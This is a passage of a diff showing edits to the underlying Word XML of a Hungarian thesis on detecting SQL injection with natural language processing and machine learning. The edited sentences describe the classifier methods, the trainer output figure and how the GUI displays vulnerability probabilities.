-        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy kód </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>sérülékenységéről van sz</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ó, így ezt a metrikát alkalmazom </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>az algoritmus</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> szelektálásá</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>hoz.</w:t>
+        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy kód sérülékenységéről van sz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ó, így ezt a metrikát </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>használom</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18063,14 +18002,222 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A felügyelt tanulás 5 fő algoritmusát hasonlítottam össze ezzel a metrikával</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
+        <w:t>a hatékonyságméréshez.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classifier:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Metódus, amely </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>adatkészlet tanításához elkülönített részét</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>használja fel</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a két állapot</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>megkülönböztetésére</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> megalkotva ezzel a program gépi tanulási modelljét.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classifier2:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Metódus, amely </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">becslést ad a paraméterként megadott </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">X </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vektor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sérülékenységével</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kapcsolatban.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Kiírja többek között annak a valószínűségét, hogy a vektor sérülékeny, annak a valószínűségét, hogy nem sérülékeny </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ennek fényében az osztályozás eredményét.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A 3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">s ábra első három </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>sora erre ad példát.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18087,7 +18234,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="749075B4" wp14:editId="46FF52CD">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="526B0DE2" wp14:editId="70008578">
             <wp:extent cx="2660650" cy="1497248"/>
             <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
             <wp:docPr id="2" name="Kép 2" descr="A képen asztal látható&#10;&#10;Automatikusan generált leírás"/>
@@ -18102,7 +18249,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17">
+                    <a:blip r:embed="rId19">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -18142,34 +18289,46 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.5-ös ábra: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\trainer.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> kimenete</w:t>
-      </w:r>
+        <w:t>3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">s </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ábra: a trainer.py kimenete</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18180,44 +18339,47 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="30"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1134" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>classifier:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Metódus, amely </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a tanulásért felelős 106.sor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>t</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A modell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hez </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">utolsó lépésként </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a grafikus felület biztosít ismeretlen adatokat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amelyeket a program </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a ’Tovább’ gomb lenyomás</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ának hatására</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18229,13 +18391,127 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>használja fel</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az adatkészlet tanításához elkülönített részét a két állapot</w:t>
+        <w:t>toimport_vulnerabilities.php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> néven ment el a többi PHP kód közé. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ez a kód a vektorizálásig ugyan azokon a lépéseken megy végig, mint a többi, ám nem lesz összefűzve </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>velük</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Helyette </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">önálló vektorokat kap, amiket a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">vecotirzer.py </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>„toimport” numpy fájlokba ment le.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ezeket olvassa be a main metódus és ad át a classifier2-nek.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A grafikus felület </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>új kódo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bekérésén kívül az eredmények kiíratásáért is felelős</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>: a classifier2 által kií</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rt első két sor valószínűségeit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">olvassa be és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>szemlélteti egy kördiagramon</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Emellett további információkat is szolgáltat többek között a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18247,145 +18523,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>megkülönböztetésére</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> megalkotva ezzel a program </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>gépi tanulási modell</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>jét.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="30"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1134" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>classifier2:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A modell</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hez </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">utolsó lépésként </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a grafikus felület biztosít ismeretlen adatokat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, amelyet</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\src\main</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> két részre oszt</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>sérülékenységről</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18397,83 +18542,13 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">grafikus felület </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">szerkezetét leíró </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>resources</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> és a viselkedését leíró </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>java</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mapp</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ára.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Adatok biztosításán kívül továbbá az eredmények is itt kerülnek kiíratásra. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>diagrams</w:t>
+        <w:t>megelőzési módjairól</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, valamint megjeleníti a korábban megadott kódot és a program futási idejét.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19452,7 +19527,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18" cstate="print">
+                    <a:blip r:embed="rId20" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -19544,7 +19619,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19" cstate="print">
+                    <a:blip r:embed="rId21" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -19642,7 +19717,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20" cstate="print">
+                    <a:blip r:embed="rId22" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -19697,9 +19772,9 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId21"/>
-      <w:footerReference w:type="default" r:id="rId22"/>
-      <w:headerReference w:type="first" r:id="rId23"/>
+      <w:headerReference w:type="default" r:id="rId23"/>
+      <w:footerReference w:type="default" r:id="rId24"/>
+      <w:headerReference w:type="first" r:id="rId25"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
       <w:cols w:space="708"/>

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -154,8 +154,174 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SQL injection detection using natural language processing systems and machine learning</w:t>
-      </w:r>
+        <w:t xml:space="preserve">SQL injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>detection</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>using</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>natural</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>language</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>processing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>systems</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
